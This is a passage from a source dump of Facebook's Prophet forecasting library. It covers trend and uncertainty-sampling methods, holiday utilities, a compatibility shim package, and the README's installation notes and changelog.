""" # Compute offset changes k_cum = np.concatenate((np.atleast_1d(k), np.cumsum(deltas) + k)) gammas = np.zeros(len(changepoint_ts)) for i, t_s in enumerate(changepoint_ts): gammas[i] = ( (t_s - m - np.sum(gammas)) * (1 - k_cum[i] / k_cum[i + 1]) # noqa W503 ) # Get cumulative rate and offset at each t k_t = k * np.ones_like(t) m_t = m * np.ones_like(t) for s, t_s in enumerate(changepoint_ts): indx = t >= t_s k_t[indx] += deltas[s] m_t[indx] += gammas[s] return cap / (1 + np.exp(-k_t * (t - m_t))) @staticmethod def flat_trend(t, m): """Evaluate the flat trend function. Parameters ---------- t: np.array of times on which the function is evaluated. m: Float initial offset. Returns ------- Vector y(t). """ m_t = m * np.ones_like(t) return m_t def predict_trend(self, df): """Predict trend using the prophet model. Parameters ---------- df: Prediction dataframe. Returns ------- Vector with trend on prediction dates. """ k = np.nanmean(self.params['k']) m = np.nanmean(self.params['m']) deltas = np.nanmean(self.params['delta'], axis=0) t = np.array(df['t']) if self.growth == 'linear': trend = self.piecewise_linear(t, deltas, k, m, self.changepoints_t) elif self.growth == 'logistic': cap = df['cap_scaled'] trend = self.piecewise_logistic( t, cap, deltas, k, m, self.changepoints_t) elif self.growth == 'flat': # constant trend trend = self.flat_trend(t, m) return trend * self.y_scale + df['floor'] def predict_seasonal_components(self, df): """Predict seasonality components, holidays, and added regressors. Parameters ---------- df: Prediction dataframe. Returns ------- Dataframe with seasonal components. """ seasonal_features, _, component_cols, _ = ( self.make_all_seasonality_features(df) ) if self.uncertainty_samples: lower_p = 100 * (1.0 - self.interval_width) / 2 upper_p = 100 * (1.0 + self.interval_width) / 2 X = seasonal_features.values data = {} for component in component_cols.columns: beta_c = self.params['beta'] * component_cols[component].values comp = np.matmul(X, beta_c.transpose()) if component in self.component_modes['additive']: comp *= self.y_scale data[component] = np.nanmean(comp, axis=1) if self.uncertainty_samples: data[component + '_lower'] = self.percentile( comp, lower_p, axis=1, ) data[component + '_upper'] = self.percentile( comp, upper_p, axis=1, ) return pd.DataFrame(data) def predict_uncertainty(self, df: pd.DataFrame, vectorized: bool) -> pd.DataFrame: """Prediction intervals for yhat and trend. Parameters ---------- df: Prediction dataframe. vectorized: Whether to use a vectorized method for generating future draws. Returns ------- Dataframe with uncertainty intervals. """ sim_values = self.sample_posterior_predictive(df, vectorized) lower_p = 100 * (1.0 - self.interval_width) / 2 upper_p = 100 * (1.0 + self.interval_width) / 2 series = {} for key in ['yhat', 'trend']: series['{}_lower'.format(key)] = self.percentile( sim_values[key], lower_p, axis=1) series['{}_upper'.format(key)] = self.percentile( sim_values[key], upper_p, axis=1) return pd.DataFrame(series) def sample_posterior_predictive(self, df: pd.DataFrame, vectorized: bool) -> Dict[str, np.ndarray]: """Prophet posterior predictive samples. Parameters ---------- df: Prediction dataframe. vectorized: Whether to use a vectorized method to generate future draws. Returns ------- Dictionary with posterior predictive samples for the forecast yhat and for the trend component. 
""" n_iterations = self.params['k'].shape[0] samp_per_iter = max(1, int(np.ceil( self.uncertainty_samples / float(n_iterations) ))) # Generate seasonality features once so we can re-use them. seasonal_features, _, component_cols, _ = ( self.make_all_seasonality_features(df) ) sim_values = {'yhat': [], 'trend': []} for i in range(n_iterations): if vectorized: sims = self.sample_model_vectorized( df=df, seasonal_features=seasonal_features, iteration=i, s_a=component_cols['additive_terms'], s_m=component_cols['multiplicative_terms'], n_samples=samp_per_iter ) else: sims = [ self.sample_model( df=df, seasonal_features=seasonal_features, iteration=i, s_a=component_cols['additive_terms'], s_m=component_cols['multiplicative_terms'], ) for _ in range(samp_per_iter) ] for key in sim_values: for sim in sims: sim_values[key].append(sim[key]) for k, v in sim_values.items(): sim_values[k] = np.column_stack(v) return sim_values def sample_model(self, df, seasonal_features, iteration, s_a, s_m) -> Dict[str, np.ndarray]: """Simulate observations from the extrapolated generative model. Parameters ---------- df: Prediction dataframe. seasonal_features: pd.DataFrame of seasonal features. iteration: Int sampling iteration to use parameters from. s_a: Indicator vector for additive components s_m: Indicator vector for multiplicative components Returns ------- Dictionary with `yhat` and `trend`, each like df['t']. """ trend = self.sample_predictive_trend(df, iteration) beta = self.params['beta'][iteration] Xb_a = np.matmul(seasonal_features.values, beta * s_a.values) * self.y_scale Xb_m = np.matmul(seasonal_features.values, beta * s_m.values) sigma = self.params['sigma_obs'][iteration] noise = np.random.normal(0, sigma, df.shape[0]) * self.y_scale return { 'yhat': trend * (1 + Xb_m) + Xb_a + noise, 'trend': trend } def sample_model_vectorized( self, df: pd.DataFrame, seasonal_features: pd.DataFrame, iteration: int, s_a: np.ndarray, s_m: np.ndarray, n_samples: int, ) -> List[Dict[str, np.ndarray]]: """Simulate observations from the extrapolated generative model. Vectorized version of sample_model(). Returns ------- List (length n_samples) of dictionaries with arrays for trend and yhat, each ordered like df['t']. """ # Get the seasonality and regressor components, which are deterministic per iteration beta = self.params['beta'][iteration] Xb_a = np.matmul(seasonal_features.values, beta * s_a.values) * self.y_scale Xb_m = np.matmul(seasonal_features.values, beta * s_m.values) # Get the future trend, which is stochastic per iteration trends = self.sample_predictive_trend_vectorized(df, n_samples, iteration) # already on the same scale as the actual data sigma = self.params['sigma_obs'][iteration] noise_terms = np.random.normal(0, sigma, trends.shape) * self.y_scale simulations = [] for trend, noise in zip(trends, noise_terms): simulations.append({ 'yhat': trend * (1 + Xb_m) + Xb_a + noise, 'trend': trend }) return simulations def sample_predictive_trend(self, df, iteration): """Simulate the trend using the extrapolated generative model. Parameters ---------- df: Prediction dataframe. iteration: Int sampling iteration to use parameters from. Returns ------- np.array of simulated trend over df['t']. 
""" k = self.params['k'][iteration] m = self.params['m'][iteration] deltas = self.params['delta'][iteration] t = np.array(df['t']) T = t.max() # New changepoints from a Poisson process with rate S on [1, T] if T > 1: S = len(self.changepoints_t) n_changes = np.random.poisson(S * (T - 1)) else: n_changes = 0 if n_changes > 0: changepoint_ts_new = 1 + np.random.rand(n_changes) * (T - 1) changepoint_ts_new.sort() else: changepoint_ts_new = [] # Get the empirical scale of the deltas, plus epsilon to avoid NaNs. lambda_ = np.mean(np.abs(deltas)) + 1e-8 # Sample deltas deltas_new = np.random.laplace(0, lambda_, n_changes) # Prepend the times and deltas from the history changepoint_ts = np.concatenate((self.changepoints_t, changepoint_ts_new)) deltas = np.concatenate((deltas, deltas_new)) if self.growth == 'linear': trend = self.piecewise_linear(t, deltas, k, m, changepoint_ts) elif self.growth == 'logistic': cap = df['cap_scaled'] trend = self.piecewise_logistic(t, cap, deltas, k, m, changepoint_ts) elif self.growth == 'flat': trend = self.flat_trend(t, m) return trend * self.y_scale + df['floor'] def sample_predictive_trend_vectorized(self, df: pd.DataFrame, n_samples: int, iteration: int = 0) -> np.ndarray: """Sample draws of the future trend values. Vectorized version of sample_predictive_trend(). Returns ------- Draws of the trend values with shape (n_samples, len(df)). Values are on the scale of the original data. """ deltas = self.params["delta"][iteration] m = self.params["m"][iteration] k = self.params["k"][iteration] if self.growth == "linear": expected = self.piecewise_linear(df["t"].values, deltas, k, m, self.changepoints_t) elif self.growth == "logistic": expected = self.piecewise_logistic( df["t"].values, df["cap_scaled"].values, deltas, k, m, self.changepoints_t ) elif self.growth == "flat": expected = self.flat_trend(df["t"].values, m) else: raise NotImplementedError uncertainty = self._sample_uncertainty(df, n_samples, iteration) return ( (np.tile(expected, (n_samples, 1)) + uncertainty) * self.y_scale + np.tile(df["floor"].values, (n_samples, 1)) ) def _sample_uncertainty(self, df: pd.DataFrame, n_samples: int, iteration: int = 0) -> np.ndarray: """Sample draws of future trend changes, vectorizing as much as possible. Parameters ---------- df: DataFrame with columns `t` (time scaled to the model context), trend, and cap. n_samples: Number of future paths of the trend to simulate iteration: The iteration of the parameter set to use. Default 0, the first iteration. Returns ------- Draws of the trend changes with shape (n_samples, len(df)). Values are standardized. 
""" # handle only historic data if df["t"].max() <= 1: # there is no trend uncertainty in historic trends uncertainties = np.zeros((n_samples, len(df))) else: future_df = df.loc[df["t"] > 1] n_length = len(future_df) # handle 1 length futures by using history if n_length > 1: single_diff = np.diff(future_df["t"]).mean() else: single_diff = np.diff(self.history["t"]).mean() change_likelihood = len(self.changepoints_t) * single_diff deltas = self.params["delta"][iteration] m = self.params["m"][iteration] k = self.params["k"][iteration] mean_delta = np.mean(np.abs(deltas)) + 1e-8 if self.growth == "linear": mat = self._make_trend_shift_matrix(mean_delta, change_likelihood, n_length, n_samples=n_samples) uncertainties = mat.cumsum(axis=1).cumsum(axis=1) # from slope changes to actual values uncertainties *= single_diff # scaled by the actual meaning of the slope elif self.growth == "logistic": mat = self._make_trend_shift_matrix(mean_delta, change_likelihood, n_length, n_samples=n_samples) uncertainties = self._logistic_uncertainty( mat=mat, deltas=deltas, k=k, m=m, cap=future_df["cap_scaled"].values, t_time=future_df["t"].values, n_length=n_length, single_diff=single_diff, ) elif self.growth == "flat": # no trend uncertainty when there is no growth uncertainties = np.zeros((n_samples, n_length)) else: raise NotImplementedError # handle past included in dataframe if df["t"].min() <= 1: past_uncertainty = np.zeros((n_samples, np.sum(df["t"] <= 1))) uncertainties = np.concatenate([past_uncertainty, uncertainties], axis=1) return uncertainties @staticmethod def _make_trend_shift_matrix( mean_delta: float, likelihood: float, future_length: float, n_samples: int ) -> np.ndarray: """ Creates a matrix of random trend shifts based on historical likelihood and size of shifts. Can be used for either linear or logistic trend shifts. Each row represents a different sample of a possible future, and each column is a time step into the future. """ # create a bool matrix of where these trend shifts should go bool_slope_change = np.random.uniform(size=(n_samples, future_length)) < likelihood shift_values = np.random.laplace(0, mean_delta, size=bool_slope_change.shape) mat = shift_values * bool_slope_change n_mat = np.hstack([np.zeros((len(mat), 1)), mat])[:, :-1] mat = (n_mat + mat) / 2 return mat @staticmethod def _make_historical_mat_time(deltas, changepoints_t, t_time, n_row=1, single_diff=None): """ Creates a matrix of slope-deltas where these changes occured in training data according to the trained prophet obj """ if single_diff is None: single_diff = np.diff(t_time).mean() prev_time = np.arange(0, 1 + single_diff, single_diff) idxs = [] for changepoint in changepoints_t: idxs.append(np.where(prev_time > changepoint)[0][0]) prev_deltas = np.zeros(len(prev_time)) prev_deltas[idxs] = deltas prev_deltas = np.repeat(prev_deltas.reshape(1, -1), n_row, axis=0) return prev_deltas, prev_time def _logistic_uncertainty( self, mat: np.ndarray, deltas: np.ndarray, k: float, m: float, cap: np.ndarray, t_time: np.ndarray, n_length: int, single_diff: float = None, ) -> np.ndarray: """ Vectorizes prophet's logistic uncertainty by creating a matrix of future possible trends. Parameters ---------- mat: A trend shift matrix returned by _make_trend_shift_matrix() deltas: The size of the trend changes at each changepoint, estimated by the model k: Float initial rate. m: Float initial offset. cap: np.array of capacities at each t. t_time: The values of t in the model context (i.e. 
scaled so that anything > 1 represents the future) n_length: For each path, the number of future steps to simulate single_diff: The difference between each t step in the model context. Default None, inferred from t_time. Returns ------- A numpy array with shape (n_samples, n_length), representing the width of the uncertainty interval (standardized, not on the same scale as the actual data values) around 0. """ def ffill(arr): mask = arr == 0 idx = np.where(~mask, np.arange(mask.shape[1]), 0) np.maximum.accumulate(idx, axis=1, out=idx) return arr[np.arange(idx.shape[0])[:, None], idx] # for logistic growth we need to evaluate the trend all the way from the start of the train item historical_mat, historical_time = self._make_historical_mat_time(deltas, self.changepoints_t, t_time, len(mat), single_diff) mat = np.concatenate([historical_mat, mat], axis=1) full_t_time = np.concatenate([historical_time, t_time]) # apply logistic growth logic on the slope changes k_cum = np.concatenate((np.ones((mat.shape[0], 1)) * k, np.where(mat, np.cumsum(mat, axis=1) + k, 0)), axis=1) k_cum_b = ffill(k_cum) gammas = np.zeros_like(mat) for i in range(mat.shape[1]): x = full_t_time[i] - m - np.sum(gammas[:, :i], axis=1) ks = 1 - k_cum_b[:, i] / k_cum_b[:, i + 1] gammas[:, i] = x * ks # the data before the -n_length is the historical values, which are not needed, so cut the last n_length k_t = (mat.cumsum(axis=1) + k)[:, -n_length:] m_t = (gammas.cumsum(axis=1) + m)[:, -n_length:] sample_trends = cap / (1 + np.exp(-k_t * (t_time - m_t))) # remove the mean because we only need width of the uncertainty centered around 0 # we will add the width to the main forecast - yhat (which is the mean) - later return sample_trends - sample_trends.mean(axis=0) def predictive_samples(self, df: pd.DataFrame, vectorized: bool = True): """Sample from the posterior predictive distribution. Returns samples for the main estimate yhat, and for the trend component. The shape of each output will be (nforecast x nsamples), where nforecast is the number of points being forecasted (the number of rows in the input dataframe) and nsamples is the number of posterior samples drawn. This is the argument `uncertainty_samples` in the Prophet constructor, which defaults to 1000. Parameters ---------- df: Dataframe with dates for predictions (column ds), and capacity (column cap) if logistic growth. vectorized: Whether to use a vectorized method to compute possible draws. Suggest using True (the default) for much faster runtimes in most cases, except when (growth = 'logistic' and mcmc_samples > 0). Returns ------- Dictionary with keys "trend" and "yhat" containing posterior predictive samples for that component. """ df = self.setup_dataframe(df.copy()) return self.sample_posterior_predictive(df, vectorized) def percentile(self, a, *args, **kwargs): """ We rely on np.nanpercentile in the rare instances where there are a small number of bad samples with MCMC that contain NaNs. However, since np.nanpercentile is far slower than np.percentile, we only fall back to it if the array contains NaNs. See https://github.com/facebook/prophet/issues/1310 for more details. """ fn = np.nanpercentile if np.isnan(a).any() else np.percentile return fn(a, *args, **kwargs) def make_future_dataframe(self, periods, freq='D', include_history=True): """Simulate the trend using the extrapolated generative model. Parameters ---------- periods: Int number of periods to forecast forward. freq: Any valid frequency for pd.date_range, such as 'D' or 'M'. 
include_history: Boolean to include the historical dates in the data frame for predictions. Returns ------- pd.Dataframe that extends forward from the end of self.history for the requested number of periods. """ if self.history_dates is None: raise Exception('Model has not been fit.') if freq is None: # taking the tail makes freq inference more reliable freq = pd.infer_freq(self.history_dates.tail(5)) # returns None if inference failed if freq is None: raise Exception('Unable to infer `freq`') last_date = self.history_dates.max() dates = pd.date_range( start=last_date, periods=periods + 1, # An extra in case we include start freq=freq) dates = dates[dates > last_date] # Drop start if equals last_date dates = dates[:periods] # Return correct number of periods if include_history: dates = np.concatenate((np.array(self.history_dates), dates)) return pd.DataFrame({'ds': dates}) def plot(self, fcst, ax=None, uncertainty=True, plot_cap=True, xlabel='ds', ylabel='y', figsize=(10, 6), include_legend=False): """Plot the Prophet forecast. Parameters ---------- fcst: pd.DataFrame output of self.predict. ax: Optional matplotlib axes on which to plot. uncertainty: Optional boolean to plot uncertainty intervals. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. xlabel: Optional label name on X-axis ylabel: Optional label name on Y-axis figsize: Optional tuple width, height in inches. include_legend: Optional boolean to add legend to the plot. Returns ------- A matplotlib figure. """ return plot( m=self, fcst=fcst, ax=ax, uncertainty=uncertainty, plot_cap=plot_cap, xlabel=xlabel, ylabel=ylabel, figsize=figsize, include_legend=include_legend ) def plot_components(self, fcst, uncertainty=True, plot_cap=True, weekly_start=0, yearly_start=0, figsize=None): """Plot the Prophet forecast components. Will plot whichever are available of: trend, holidays, weekly seasonality, and yearly seasonality. Parameters ---------- fcst: pd.DataFrame output of self.predict. uncertainty: Optional boolean to plot uncertainty intervals. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. weekly_start: Optional int specifying the start day of the weekly seasonality plot. 0 (default) starts the week on Sunday. 1 shifts by 1 day to Monday, and so on. yearly_start: Optional int specifying the start day of the yearly seasonality plot. 0 (default) starts the year on Jan 1. 1 shifts by 1 day to Jan 2, and so on. figsize: Optional tuple width, height in inches. Returns ------- A matplotlib figure. """ return plot_components( m=self, fcst=fcst, uncertainty=uncertainty, plot_cap=plot_cap, weekly_start=weekly_start, yearly_start=yearly_start, figsize=figsize ) File: python/prophet/utilities.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import numpy as np import pandas as pd def regressor_index(m, name): """Given the name of a regressor, return its (column) index in the `beta` matrix. Parameters ---------- m: Prophet model object, after fitting. name: Name of the regressor, as passed into the `add_regressor` function. Returns ------- The column index of the regressor in the `beta` matrix. 
""" return np.extract( m.train_component_cols[name] == 1, m.train_component_cols.index )[0] def regressor_coefficients(m): """Summarise the coefficients of the extra regressors used in the model. For additive regressors, the coefficient represents the incremental impact on `y` of a unit increase in the regressor. For multiplicative regressors, the incremental impact is equal to `trend(t)` multiplied by the coefficient. Coefficients are measured on the original scale of the training data. Parameters ---------- m: Prophet model object, after fitting. Returns ------- pd.DataFrame containing: - `regressor`: Name of the regressor - `regressor_mode`: Whether the regressor has an additive or multiplicative effect on `y`. - `center`: The mean of the regressor if it was standardized. Otherwise 0. - `coef_lower`: Lower bound for the coefficient, estimated from the MCMC samples. Only different to `coef` if `mcmc_samples > 0`. - `coef`: Expected value of the coefficient. - `coef_upper`: Upper bound for the coefficient, estimated from MCMC samples. Only to different to `coef` if `mcmc_samples > 0`. """ assert len(m.extra_regressors) > 0, 'No extra regressors found.' coefs = [] for regressor, params in m.extra_regressors.items(): beta = m.params['beta'][:, regressor_index(m, regressor)] if params['mode'] == 'additive': coef = beta * m.y_scale / params['std'] else: coef = beta / params['std'] percentiles = [ (1 - m.interval_width) / 2, 1 - (1 - m.interval_width) / 2, ] coef_bounds = np.quantile(coef, q=percentiles) record = { 'regressor': regressor, 'regressor_mode': params['mode'], 'center': params['mu'], 'coef_lower': coef_bounds[0], 'coef': np.mean(coef), 'coef_upper': coef_bounds[1], } coefs.append(record) return pd.DataFrame(coefs) def warm_start_params(m): """ Retrieve parameters from a trained model in the format used to initialize a new Stan model. Note that the new Stan model must have these same settings: n_changepoints, seasonality features, mcmc sampling for the retrieved parameters to be valid for the new model. Parameters ---------- m: A trained model of the Prophet class. Returns ------- A Dictionary containing retrieved parameters of m. """ res = {} for pname in ['k', 'm', 'sigma_obs']: if m.mcmc_samples == 0: res[pname] = m.params[pname][0][0] else: res[pname] = np.mean(m.params[pname]) for pname in ['delta', 'beta']: if m.mcmc_samples == 0: res[pname] = m.params[pname][0] else: res[pname] = np.mean(m.params[pname], axis=0) return res File: python/prophet/make_holidays.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import numpy as np import pandas as pd import holidays def get_country_holidays_class(country): """Get class for a supported country. Parameters ---------- country: country code Returns ------- A valid country holidays class """ substitutions = { "TU": "TR", # For compatibility with Turkey as 'TU' cases. 
} country = substitutions.get(country, country) if not hasattr(holidays, country): raise AttributeError(f"Holidays in {country} are not currently supported!") return getattr(holidays, country) def get_holiday_names(country): """Return all possible holiday names of given country Parameters ---------- country: country name Returns ------- A set of all possible holiday names of given country """ country_holidays = get_country_holidays_class(country) return set(country_holidays(language="en_US", years=np.arange(1995, 2045)).values()) def make_holidays_df(year_list, country, province=None, state=None): """Make dataframe of holidays for given years and countries Parameters ---------- year_list: a list of years country: country name Returns ------- Dataframe with 'ds' and 'holiday', which can directly feed to 'holidays' params in Prophet """ country_holidays = get_country_holidays_class(country) holidays = country_holidays(expand=False, language="en_US", subdiv=province, years=year_list) holidays_df = pd.DataFrame( [(date, holidays.get_list(date)) for date in holidays], columns=["ds", "holiday"], ) holidays_df = holidays_df.explode("holiday") holidays_df.reset_index(inplace=True, drop=True) holidays_df["ds"] = pd.to_datetime(holidays_df["ds"]) return holidays_df File: python/scripts/generate_holidays_file.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import re import unicodedata import pandas as pd import numpy as np from holidays import list_supported_countries from prophet.make_holidays import make_holidays_df def utf8_to_ascii(text: str) -> str: """Holidays often have utf-8 characters. These are not allowed in R package data (they generate a NOTE). TODO: revisit whether we want to do this lossy conversion. """ ascii_text = unicodedata.normalize("NFD", text).encode("ascii", "ignore").decode("ascii") # Remove trailing empty brackets and spaces. ascii_text = re.sub(r"\(\)$", "", ascii_text).strip() # Check if anything converted if sum(1 for x in ascii_text if x not in [" ", "(", ")", ","]) == 0: return "FAILED_TO_PARSE" else: return ascii_text def generate_holidays_df() -> pd.DataFrame: """Generate csv file of all possible holiday names, ds, and countries, year combination.""" country_codes = set(list_supported_countries().keys()) # For compatibility with Turkey as 'TU' cases. 
country_codes.add("TU") all_holidays = [] for country_code in country_codes: df = make_holidays_df( year_list=np.arange(1995, 2045, 1).tolist(), country=country_code, ) df["country"] = country_code all_holidays.append(df) generated_holidays = pd.concat(all_holidays, axis=0, ignore_index=True) generated_holidays["year"] = generated_holidays.ds.dt.year generated_holidays.sort_values(["country", "ds", "holiday"], inplace=True) # Convert to ASCII, and drop holidays that fail to convert generated_holidays["holiday"] = generated_holidays["holiday"].apply(utf8_to_ascii) failed_countries = generated_holidays.loc[ generated_holidays["holiday"] == "FAILED_TO_PARSE", "country" ].unique() if len(failed_countries) > 0: print("Failed to convert UTF-8 holidays for:") print("\n".join(failed_countries)) assert "FAILED_TO_PARSE" not in generated_holidays["holiday"].unique() return generated_holidays if __name__ == "__main__": import argparse import pathlib if not pathlib.Path.cwd().stem == "python": raise RuntimeError("Run script from prophet/python directory") OUT_CSV_PATH = pathlib.Path(".") / ".." / "R/data-raw/generated_holidays.csv" parser = argparse.ArgumentParser() parser.add_argument("-o", "--outfile", default=OUT_CSV_PATH) args = parser.parse_args() df = generate_holidays_df() df.to_csv(args.outfile, index=False) File: python_shim/setup.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from setuptools import setup, find_packages with open('README.md', 'r', encoding='utf-8') as f: long_description = f.read() with open('requirements.txt', 'r') as f: install_requires = f.read().splitlines() setup( name='fbprophet', version='1.0.1', description='Automatic Forecasting Procedure', url='https://facebook.github.io/prophet/', author='Sean J. Taylor <[email protected]>, Ben Letham <[email protected]>', author_email='[email protected]', license='MIT', packages=find_packages(), setup_requires=[], install_requires=install_requires, python_requires='>=3', zip_safe=False, include_package_data=True, test_suite='fbprophet.tests', classifiers=[ 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', ], long_description=long_description, long_description_content_type='text/markdown', ) File: python_shim/fbprophet/serialize.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.serialize import * File: python_shim/fbprophet/plot.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.plot import * File: python_shim/fbprophet/models.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.models import * File: python_shim/fbprophet/diagnostics.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.diagnostics import * File: python_shim/fbprophet/__init__.py # Copyright (c) Facebook, Inc. and its affiliates. 
# This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import logging from prophet.forecaster import Prophet logger = logging.getLogger('fbprophet') logger.warning( 'As of v1.0, the package name has changed from "fbprophet" to "prophet". ' 'Please update references in your code accordingly.' ) File: python_shim/fbprophet/forecaster.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.forecaster import * File: python_shim/fbprophet/make_holidays.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.make_holidays import *
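The python_shim modules above are thin re-export shims: each legacy `fbprophet` module star-imports its `prophet` counterpart, and `fbprophet/__init__.py` logs a rename warning on import. A minimal sketch of what a downstream user observes (assuming both the renamed `prophet` package and this shim are installed):

```python
# Importing under the legacy name triggers the logger.warning defined in
# python_shim/fbprophet/__init__.py, but resolves to the same class object
# that the renamed package provides.
from fbprophet import Prophet as LegacyProphet   # logs the rename notice
from prophet.forecaster import Prophet           # canonical location

assert LegacyProphet is Prophet  # the shim re-exports; it does not duplicate
```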
# Prophet: Automatic Forecasting Procedure ![Build](https://github.com/facebook/prophet/workflows/Build/badge.svg) [![PyPI Version](https://img.shields.io/pypi/v/prophet.svg)](https://pypi.python.org/pypi/prophet) [![PyPI Downloads Monthly](https://pepy.tech/badge/prophet/month)](https://pepy.tech/project/prophet) [![PyPI Downloads All](https://pepy.tech/badge/prophet)](https://pepy.tech/project/prophet) [![CRAN Version](https://www.r-pkg.org/badges/version/prophet)](https://CRAN.R-project.org/package=prophet) [![CRAN Downloads Monthly](https://cranlogs.r-pkg.org/badges/prophet?color=brightgreen)](https://cran.r-project.org/package=prophet) [![CRAN Downloads All](https://cranlogs.r-pkg.org/badges/grand-total/prophet?color=brightgreen)](https://cranlogs.r-pkg.org/badges/grand-total/prophet) [![Conda_Version](https://anaconda.org/conda-forge/prophet/badges/version.svg)](https://anaconda.org/conda-forge/prophet/) ----- **2023 Update:** We discuss our plans for the future of Prophet in this blog post: [facebook/prophet in 2023 and beyond](https://medium.com/@cuongduong_35162/facebook-prophet-in-2023-and-beyond-c5086151c138) ----- Prophet is a procedure for forecasting time series data based on an additive model where non-linear trends are fit with yearly, weekly, and daily seasonality, plus holiday effects. It works best with time series that have strong seasonal effects and several seasons of historical data. Prophet is robust to missing data and shifts in the trend, and typically handles outliers well. Prophet is [open source software](https://code.facebook.com/projects/) released by Facebook's [Core Data Science team](https://research.fb.com/category/data-science/). It is available for download on [CRAN](https://cran.r-project.org/package=prophet) and [PyPI](https://pypi.python.org/pypi/prophet/). ## Important links - Homepage: https://facebook.github.io/prophet/ - HTML documentation: https://facebook.github.io/prophet/docs/quick_start.html - Issue tracker: https://github.com/facebook/prophet/issues - Source code repository: https://github.com/facebook/prophet - Contributing: https://facebook.github.io/prophet/docs/contributing.html - Prophet R package: https://cran.r-project.org/package=prophet - Prophet Python package: https://pypi.python.org/pypi/prophet/ - Release blogpost: https://research.facebook.com/blog/2017/2/prophet-forecasting-at-scale/ - Prophet paper: Sean J. Taylor, Benjamin Letham (2018) Forecasting at scale. The American Statistician 72(1):37-45 (https://peerj.com/preprints/3190.pdf). ## Installation in R - CRAN ⚠️ **The CRAN version of prophet is fairly outdated. To get the latest bug fixes and updated country holiday data, we suggest installing the [latest release](#installation-in-r---latest-release).** Prophet is a [CRAN package](https://cran.r-project.org/package=prophet) so you can use `install.packages`. ```r install.packages('prophet') ``` After installation, you can [get started!](https://facebook.github.io/prophet/docs/quick_start.html#r-api) ## Installation in R - Latest release ```r install.packages('remotes') remotes::install_github('facebook/prophet@*release', subdir = 'R') ``` #### Experimental backend - cmdstanr You can also choose an experimental alternative stan backend called `cmdstanr`. 
Once you've installed `prophet`, follow these instructions to use `cmdstanr` instead of `rstan` as the backend: ```r # R # We recommend running this in a fresh R session or restarting your current session install.packages(c("cmdstanr", "posterior"), repos = c("https://mc-stan.org/r-packages/", getOption("repos"))) # If you haven't installed cmdstan before, run: cmdstanr::install_cmdstan() # Otherwise, you can point cmdstanr to your cmdstan path: cmdstanr::set_cmdstan_path(path = <your existing cmdstan>) # Set the R_STAN_BACKEND environment variable Sys.setenv(R_STAN_BACKEND = "CMDSTANR") ``` ### Windows On Windows, R requires a compiler so you'll need to [follow the instructions](https://github.com/stan-dev/rstan/wiki/RStan-Getting-Started) provided by `rstan`. The key step is installing [Rtools](http://cran.r-project.org/bin/windows/Rtools/) before attempting to install the package. If you have custom Stan compiler settings, install from source rather than the CRAN binary. ## Installation in Python - PyPI release Prophet is on PyPI, so you can use `pip` to install it. ```bash python -m pip install prophet ``` * From v0.6 onwards, Python 2 is no longer supported. * As of v1.0, the package name on PyPI is "prophet"; prior to v1.0 it was "fbprophet". * As of v1.1, the minimum supported Python version is 3.7. After installation, you can [get started!](https://facebook.github.io/prophet/docs/quick_start.html#python-api) ### Anaconda Prophet can also be installed through conda-forge. ```bash conda install -c conda-forge prophet ``` ## Installation in Python - Development version To get the latest code changes as they are merged, you can clone this repo and build from source manually. This is **not** guaranteed to be stable. ```bash git clone https://github.com/facebook/prophet.git cd prophet/python python -m pip install -e . ``` By default, Prophet will use a fixed version of `cmdstan` (downloading and installing it if necessary) to compile the model executables. If this is undesired and you would like to use your own existing `cmdstan` installation, you can set the environment variable `PROPHET_REPACKAGE_CMDSTAN` to `False`: ```bash export PROPHET_REPACKAGE_CMDSTAN=False; python -m pip install -e . ``` ### Linux Make sure compilers (gcc, g++, build-essential) and Python development tools (python-dev, python3-dev) are installed. In Red Hat systems, install the packages gcc64 and gcc64-c++. If you are using a VM, be aware that you will need at least 4GB of memory to install prophet, and at least 2GB of memory to use prophet. ### Windows Using `cmdstanpy` with Windows requires a Unix-compatible C compiler such as mingw-gcc. If cmdstanpy is installed first, one can be installed via the `cmdstanpy.install_cxx_toolchain` command. ## Changelog ### Version 1.1.5 (2023.10.10) #### Python - Upgraded cmdstan version to 2.33.1, enabling Apple M2 support. - Added pre-built wheels for macOS arm64 architecture (M1, M2 chips) - Added argument `scaling` to the `Prophet()` instantiation. Allows `minmax` scaling on `y` instead of `absmax` scaling (dividing by the maximum value). `scaling='absmax'` by default, preserving the behaviour of previous versions. - Added argument `holidays_mode` to the `Prophet()` instantiation. Allows holidays regressors to have a different mode than seasonality regressors. `holidays_mode` takes the same value as `seasonality_mode` if not specified, preserving the behaviour of previous versions. 
